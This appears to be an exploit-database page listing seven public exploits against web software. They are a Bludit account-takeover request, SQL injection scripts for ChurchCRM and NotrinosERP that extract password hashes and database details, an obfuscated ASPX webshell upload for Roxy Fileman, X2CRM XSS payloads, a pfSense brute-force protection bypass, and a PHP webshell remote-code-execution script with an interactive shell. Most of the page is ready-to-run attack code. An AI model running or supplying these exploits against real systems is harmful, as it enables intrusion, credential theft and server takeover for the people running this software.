Latest exploits :: CodePwn

<pre><code>## Title: Bludit-4.0.0-rc-2 - Release candidate 2 Account takeover: API token vulnerability ## Author: nu11secur1ty ## Date: 04.11.2013 ## Vendor: https://www.bludit.com/ ## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2 ## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/ ## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit ## Description: The already authenticated attacker can send a normal request to change his password and then he can use the same JSON `object` and the vulnerable `API token KEY` in the same request to change the admin account password. Then he can access the admin account and he can do very malicious stuff. STATUS: HIGH Vulnerability [+]Exploit: ```PUT PUT /api/users/admin HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 138 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36 content-type: application/json Accept: */* Origin: http://127.0.0.1:8000 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8000/admin/edit-user/pwned Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui Connection: close {"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"} ``` [+]Response: ```HTTP HTTP/1.1 200 OK Host: 127.0.0.1:8000 Date: Tue, 11 Apr 2023 08:33:51 GMT Connection: close X-Powered-By: PHP/7.4.30 Access-Control-Allow-Origin: * Content-Type: application/json {"status":"0","message":"User edited.","data":{"key":"admin"}} ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2) ## Proof and Exploit: [href](https://streamable.com/w3aa4d) ## Time spend: 00:57:00 </code></pre>

<pre><code># Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection # Date: 11-03-2023 # Exploit Author: Arvandy # Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md # Software Link: https://github.com/ChurchCRM/CRM/releases # Vendor Homepage: http://churchcrm.io/ # Version: 4.5.1 # Tested on: Windows, Linux # CVE: CVE-2023-24787 """ The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter. This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query. This script is created as Proof of Concept to retrieve the username and password hash from user_usr table. """ import sys, requests def dumpUserTable(target, session_cookies): print("(+) Retrieving username and password") print("") url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)} r = requests.get(url, headers=headers) lines = r.text.splitlines() for line in lines: if "<td >Perseverance" in line: print(line.split("Perseverance")[1].split("</td>")[0]) def login(target, username, password): target = "%s/session/begin" % (target) headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = "User=%s&Password=%s" % (username, password) s = requests.session() r = s.post(target, data = data, headers = headers) return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08') def main(): print("(!) Login to the target application") session_cookies = login(target, username, password) print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash") dumpUserTable(target, session_cookies) if __name__ == "__main__": if len(sys.argv) != 4: print("(!) Usage: python3 exploit.py <URL> <username> <password>") print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass") sys.exit(-1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main() </code></pre>

<pre><code># Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection # Date: 11-03-2023 # Exploit Author: Arvandy # Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md # Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7 # Vendor Homepage: https://notrinos.com/ # Version: 0.7 # Tested on: Windows, Linux # CVE: CVE-2023-24788 """ The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order. The OrderNumber parameter require a valid orderNumber value. This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application. """ import sys, requests def injection(target, inj_str, session_cookies): for j in range(32, 126): url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j))) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)} r = requests.get(url, headers=headers) res = r.text if "NotrinosERP 0.7 - Login" in res: session_cookies = login(target, username, password) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)} r = requests.get(url, headers=headers) elif (r.elapsed.total_seconds () > 2 ): return j return None def login(target, username, password): target = "%s/index.php" % (target) headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password) s = requests.session() r = s.post(target, data = data, headers = headers) return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781') def retrieveDBName(session_cookies): db_name = "" print("(+) Retrieving database name") for i in range (1,100): injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): db_name += chr(retrieved_value) else: break print("Database Name: "+db_name) def retrieveDBVersion(session_cookies): db_version = "" print("(+) Retrieving database version") for i in range (1,100): injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): db_version += chr(retrieved_value) sys.stdout.flush() else: break print("Database Version: "+db_version) def main(): print("(!) Login to the target application") session_cookies = login(target, username, password) print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions") retrieveDBName(session_cookies) print("") retrieveDBVersion(session_cookies) if __name__ == "__main__": if len(sys.argv) != 4: print("(!) Usage: python3 exploit.py <URL> <username> <password>") print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass") sys.exit(-1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main() </code></pre>

<pre><code># Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload # Date: 09/04/2023 # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # Vendor Homepage: roxyfileman.com # Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net # Version: <= 1.4.5 # Tested on: Windows 10 and Windows Server 2019 # CVE : 0DAY ########################################################################################## # First, we upload the .jpg shell file to the server. # ########################################################################################## POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 666 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJ Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="action" upload ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="method" ajax ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="d" /Upload/PenTest ------WebKitFormBoundarygOxjsc2hpmwmISeJ Content-Disposition: form-data; name="files[]"; filename="test.jpg" Content-Type: image/jpeg â€°PNG <%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %> <%var PAY:String= Request["\x61\x62\x63\x64"];eval (PAY,"\x75\x6E\x73\x61"+ "\x66\x65");%> ------WebKitFormBoundarygOxjsc2hpmwmISeJ-- ########################################################################################## # In the second stage, we manipulate the .jpg file that we uploaded to the server. # ########################################################################################## { "FILES_ROOT": "", "RETURN_URL_PREFIX": "", "SESSION_PATH_KEY": "", "THUMBS_VIEW_WIDTH": "140", "THUMBS_VIEW_HEIGHT": "120", "PREVIEW_THUMB_WIDTH": "300", "PREVIEW_THUMB_HEIGHT":"200", "MAX_IMAGE_WIDTH": "1000", "MAX_IMAGE_HEIGHT": "1000", "INTEGRATION": "ckeditor", "DIRLIST": "asp_net/main.ashx?a=DIRLIST", "CREATEDIR": "asp_net/main.ashx?a=CREATEDIR", "DELETEDIR": "asp_net/main.ashx?a=DELETEDIR", "MOVEDIR": "asp_net/main.ashx?a=MOVEDIR", "COPYDIR": "asp_net/main.ashx?a=COPYDIR", "RENAMEDIR": "asp_net/main.ashx?a=RENAMEDIR", "FILESLIST": "asp_net/main.ashx?a=FILESLIST", "UPLOAD": "asp_net/main.ashx?a=UPLOAD", "DOWNLOAD": "asp_net/main.ashx?a=DOWNLOAD", "DOWNLOADDIR": "asp_net/main.ashx?a=DOWNLOADDIR", "DELETEFILE": "asp_net/main.ashx?a=DELETEFILE", "MOVEFILE": "asp_net/main.ashx?a=MOVEFILE", "COPYFILE": "asp_net/main.ashx?a=COPYFILE", "RENAMEFILE": "asp_net/main.ashx?a=RENAMEFILE", "GENERATETHUMB": "asp_net/main.ashx?a=GENERATETHUMB", "DEFAULTVIEW": "list", "FORBIDDEN_UPLOADS": "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess", "ALLOWED_UPLOADS": "bmp gif png jpg jpeg", "FILEPERMISSIONS": "0644", "DIRPERMISSIONS": "0755", "LANG": "auto", "DATEFORMAT": "dd/MM/yyyy HH:mm", "OPEN_LAST_DIR": "yes" } ############################################################################################################################################################################################################################ # We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows. # ############################################################################################################################################################################################################################ POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 44 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx =========================================================================================================================================================================================================================== POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2 Host: pentest.com Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest Content-Length: 68 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://pentest.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pentest.com/admin/fileman/index.aspx Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx ########################################################################################## # and it's done! # ########################################################################################## HTTP/2 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/10.0 X-Aspnet-Version: 4.0.30319 X-Powered-By-Plesk: PleskWin Date: Sun, 09 Apr 2023 09:49:34 GMT Content-Length: 21 {"res":"ok","msg":""} ============================================================================================= </code></pre>

<pre><code># Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated) # Exploit Author: Betul Denizler # Vendor Homepage: https://x2crm.com/ # Software Link: https://sourceforge.net/projects/x2engine/ # Version: X2CRM v6.6/6.9 # Tested on: Ubuntu Mate 20.04 # Vulnerable Parameter: Actions[subject] # CVE: CVE-2022-48178 # Date: 27.12.2022 ''' POC REQUEST: ======== POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 172 Origin: http://localhost Connection: close Referer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1 Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsr Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=test EXPLOITATION ======== 1. Create an action 2. Inject payload to the vulnerable parameter in POST request Payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E ''' # Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated) # Exploit Author: Betul Denizler # Vendor Homepage: https://x2crm.com/ # Software Link: https://sourceforge.net/projects/x2engine/ # Version: X2CRM v6.6/6.9 # Tested on: Ubuntu Mate 20.04 # Vulnerable Parameter: model # CVE: Use CVE-2022-48177 # Date: 27.12.2022 ''' POC REQUEST: ======== GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 EXPLOITATION ======== 1. Select Import Records Model in admin settings 2. Inject payload to the vulnerable parameter in GET request Payload: "><body onload="alert(4)"> ''' </code></pre>

<pre><code>#!/usr/bin/python3 ## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass ## Google Dork: intitle:"pfSense - Login" ## Date: 2023-04-07 ## Exploit Author: FabDotNET (Fabien MAISONNETTE) ## Vendor Homepage: https://www.pfsense.org/ ## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz ## Version: pfSenseCE <= 2.6.0 ## CVE: CVE-2023-27100 # Vulnerability ## CVE: CVE-2023-27100 ## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100 ## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc ## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66 import requests import sys import re import argparse import textwrap from urllib3.exceptions import InsecureRequestWarning # Expected Arguments parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : ./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt ./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt''')) parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)") parser.add_argument("-u", "--usersList", help="Username Dictionary") parser.add_argument("-p", "--passwdList", help="Password Dictionary") args = parser.parse_args() if len(sys.argv) < 2: print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]") sys.exit(1) # Variable url = args.url usersList = args.usersList passwdList = args.passwdList # Suppress only the single warning from urllib3 needed. if url.upper().startswith("HTTPS://"): requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass') def login(userlogin, userpasswd): session = requests.session() r = session.get(url, verify=False) # Getting CSRF token value csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text) csrftoken = csrftoken.group(1) # Specifying Headers Value headerscontent = { 'User-Agent': 'Mozilla/5.0', 'Referer': f"{url}", 'X-Forwarded-For': '42.42.42.42' } # POST REQ data postreqcontent = { '__csrf_magic': f"{csrftoken}", 'usernamefld': f"{userlogin}", 'passwordfld': f"{userpasswd}", 'login': 'Sign+In' } # Sending POST REQ r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False) # Conditional loops if r.status_code != 200: print(f'[*] - Found Valid Credential !!') print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}") sys.exit(0) # Reading User.txt & Pass.txt files userfile = open(usersList).readlines() passfile = open(passwdList).readlines() for user in userfile: user = user.strip() for passwd in passfile: passwd = passwd.strip() login(user, passwd) </code></pre>

<pre><code>#!/usr/bin/env python3 # Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE) # Date: 09/04/2023 # Exploit Author: Matisse Beckandt (Backendt) # Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip # Version: 1.0 # Tested on: Debian 11.6 # CVE : CVE-2023-1826 # Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution. import requests from argparse import ArgumentParser from uuid import uuid4 from datetime import datetime, timezone def interactiveShell(fileUrl: str): print("Entering pseudo-shell. Type 'exit' to quit") while True: command = input("\n$ ") if command == "exit": break response = requests.get(f"{fileUrl}?cmd={command}") print(response.text) def uploadFile(url: str, filename: str, content): endpoint = f"{url}/classes/SystemSettings.php?f=update_settings" file = {"img": (filename, content)} response = requests.post(endpoint, files=file) return response def getUploadedFileUrl(url: str, filename: str): timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes epoch = int(timeNow.timestamp()) # Time in milliseconds possibleFilename = f"{epoch}_{filename}" fileUrl = f"{url}/uploads/{possibleFilename}" response = requests.get(fileUrl) if response.status_code == 200: return fileUrl def exploit(url: str): filename = str(uuid4()) + ".php" content = "<?php system($_GET['cmd'])?>" response = uploadFile(url, filename, content) if response.status_code != 200: print(f"[File Upload] Got status code {response.status_code}. Expected 200.") uploadedUrl = getUploadedFileUrl(url, filename) if uploadedUrl == None: print("Error. Could not find the uploaded file.") exit(1) print(f"Uploaded file is at {uploadedUrl}") try: interactiveShell(uploadedUrl) except KeyboardInterrupt: pass print("\nQuitting.") def getWebsiteURL(url: str): if not url.startswith("http"): url = "http://" + url if url.endswith("/"): url = url[:-1] return url def main(): parser = ArgumentParser(description="Exploit for CVE-2023-1826") parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/") args = parser.parse_args() url = getWebsiteURL(args.url) exploit(url) if __name__ == "__main__": main() </code></pre>